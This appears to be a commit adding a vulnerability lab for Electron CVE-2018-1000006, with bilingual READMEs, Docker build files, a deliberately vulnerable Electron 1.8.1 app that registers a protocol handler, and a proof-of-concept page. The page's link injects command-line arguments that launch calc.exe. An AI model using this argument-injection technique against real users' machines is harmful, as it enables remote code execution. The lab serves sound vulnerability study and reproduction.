first commit

electron/CVE-2018-1000006/README.md

@@ -0,0 +1,41 @@
+# Electron Remote Code Execution Vulnerability（CVE-2018-1000006）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime and apps can be packaged for Mac, Windows, and Linux.
+
+On Windows, if an application developed by Electron registers a Protocol Handler (allowing the user to call the application in the browser), a parameter injection vulnerability may occur and eventually cause remote code vulnerability on the user side.
+
+Reference link:[Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】](https://xianzhi.aliyun.com/forum/topic/1990)
+
+## Setup
+
+Execute the following commands to compile an vulnerability application:
+
+```
+docker compose run -e ARCH=64 --rm electron
+```
+
+Because the software needs to run on the Windows platform, it is necessary to set the value of the ARCH to the number of bits of the platform: 32 or 64.
+
+After the compilation completed, execute the following command to run the web service:
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+Now, access`http://your-ip:8080/`You can see the POC page.
+
+## Exploit
+
+First, on the POC page, click on the first link and download the compiled software `vulhub-app.tar.gz`. After the download is complete, extract it and run it once:
+
+![](1.png)
+
+This time the Protocol Handler will be registered.
+
+Then, go back to the POC page and click on the second link. The target software and calculator will pop up:
+
+![](2.png)
+
+> If fails, it may be browser's reason. After testing, the new Chrome browser will call vulhub-app when it clicks on the POC, but it will not execute calc.exe.

electron/CVE-2018-1000006/README.zh-cn.md

@@ -0,0 +1,39 @@
+# electron 远程命令执行漏洞（CVE-2018-1000006）
+
+Electron是由Github开发，用HTML，CSS和JavaScript来构建跨平台桌面应用程序的一个开源库。 Electron通过将Chromium和Node.js合并到同一个运行时环境中，并将其打包为Mac，Windows和Linux系统下的应用来实现这一目的。
+
+在Windows下，如果Electron开发的应用注册了Protocol Handler（允许用户在浏览器中召起该应用），则可能出现一个参数注入漏洞，并最终导致在用户侧执行任意命令。
+
+参考链接：[Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】](https://xianzhi.aliyun.com/forum/topic/1990)
+
+## 编译APP
+
+执行如下命令编译一个包含漏洞的应用：
+
+```
+docker compose run -e ARCH=64 --rm electron
+```
+
+上述命令中，因为软件需要在Windows平台上运行，所以需要设置ARCH的值为平台的位数：32或64。
+
+编译完成后，再执行如下命令，启动web服务：
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+此时，访问`http://your-ip:8080/`即可看到POC页面。
+
+## 复现漏洞
+
+首先，在POC页面，点击第一个链接，下载编译好的软件`vulhub-app.tar.gz`。下载完成后解压，并运行一次：
+
+![](1.png)
+
+这一次将注册Protocol Handler。
+
+然后，再回到POC页面，点击第二个链接，将会弹出目标软件和计算器：
+
+![](2.png)
+
+> 如果没有成功，可能是浏览器原因。经测试，新版Chrome浏览器点击POC时，会召起vulhub-app，但不会触发该漏洞。

electron/CVE-2018-1000006/build/index.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <title>CVE-2018-1000006 POC</title>
+  </head>
+  <body>
+    <h1>CVE-2018-1000006 POC</h1>
+    <p>download the <a href="./vulhub-app.tar.gz">vulhub-app.tar.gz</a></p>
+    <p>and <a href='vulhub://example.com/" "--no-Sandbox" "--gpu-launcher=calc.exe'>click me</a></p>
+  </body>
+</html>

electron/CVE-2018-1000006/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+ electron:
+   image: vulhub/electron:wine
+   command: bash /docker-entrypoint.sh
+   volumes:
+    - ./src:/project
+    - ./build:/build
+    - ./docker-entrypoint.sh:/docker-entrypoint.sh
+ web:
+   image: nginx:1
+   volumes:
+    - ./build:/usr/share/nginx/html
+   ports:
+    - "8080:80"

electron/CVE-2018-1000006/docker-entrypoint.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+set -ex 
+
+cd /project && npm install && npm run build-${ARCH:=64}
+
+if [ -d "/build/vulhub-app-win32-x64" ] || [ -d "/build/vulhub-app-win32-ia32" ]; then
+    tar -zcvf /build/vulhub-app.tar.gz /build/vulhub-app-win32-*
+    rm -rf /build/vulhub-app-win32-*
+fi

electron/CVE-2018-1000006/src/index.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <title>Hello World!</title>
+  </head>
+  <body>
+    <h1>Hello World!</h1>
+    This is a demo for CVE-2018-1000006</br> 
+    Electron version:<script>document.write(process.versions['electron'])</script>.
+  </body>
+</html>

electron/CVE-2018-1000006/src/main.js

@@ -0,0 +1,57 @@
+const {app, BrowserWindow} = require('electron')
+const path = require('path')
+const url = require('url')
+const dialog = require('electron').dialog
+// Keep a global reference of the window object, if you don't, the window will
+// be closed automatically when the JavaScript object is garbage collected.
+let win
+
+function createWindow () {
+  // Create the browser window.
+  win = new BrowserWindow({width: 800, height: 600})
+
+  // and load the index.html of the app.
+  win.loadURL(url.format({
+    pathname: path.join(__dirname, 'index.html'),
+    protocol: 'file:',
+    slashes: true
+  }))
+
+
+  // Emitted when the window is closed.
+  win.on('closed', function(){
+    // Dereference the window object, usually you would store windows
+    // in an array if your app supports multi windows, this is the time
+    // when you should delete the corresponding element.
+    win = null
+  })
+}
+
+// This method will be called when Electron has finished
+// initialization and is ready to create browser windows.
+// Some APIs can only be used after this event occurs.
+app.on('ready', createWindow)
+
+// Quit when all windows are closed.
+app.on('window-all-closed', () => {
+  // On macOS it is common for applications and their menu bar
+  // to stay active until the user quits explicitly with Cmd + Q
+  if (process.platform !== 'darwin') {
+    app.quit()
+  }
+})
+
+app.on('activate', function(){
+  // On macOS it's common to re-create a window in the app when the
+  // dock icon is clicked and there are no other windows open.
+
+  if (win === null) {
+    createWindow()
+  }
+})
+app.setAsDefaultProtocolClient('vulhub')
+
+app.on('open-url', function (event, url) {
+  dialog.showErrorBox('Welcome Back', `You arrived from: ${url}`)
+})
+

electron/CVE-2018-1000006/src/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "vulhub-app",
+  "version": "0.0.1",
+  "main": "main.js",
+  "scripts": {
+    "build-32": "electron-packager . vulhub-app --platform=win32 --arch=ia32 --electronVersion=1.8.1 --appVersion=0.0.1 --out=/build",
+    "build-64": "electron-packager . vulhub-app --platform=win32 --arch=x64 --electronVersion=1.8.1 --appVersion=0.0.1 --out=/build"
+  },
+  "devDependencies": {
+    "electron-packager": "^12.0.2"
+  }
+}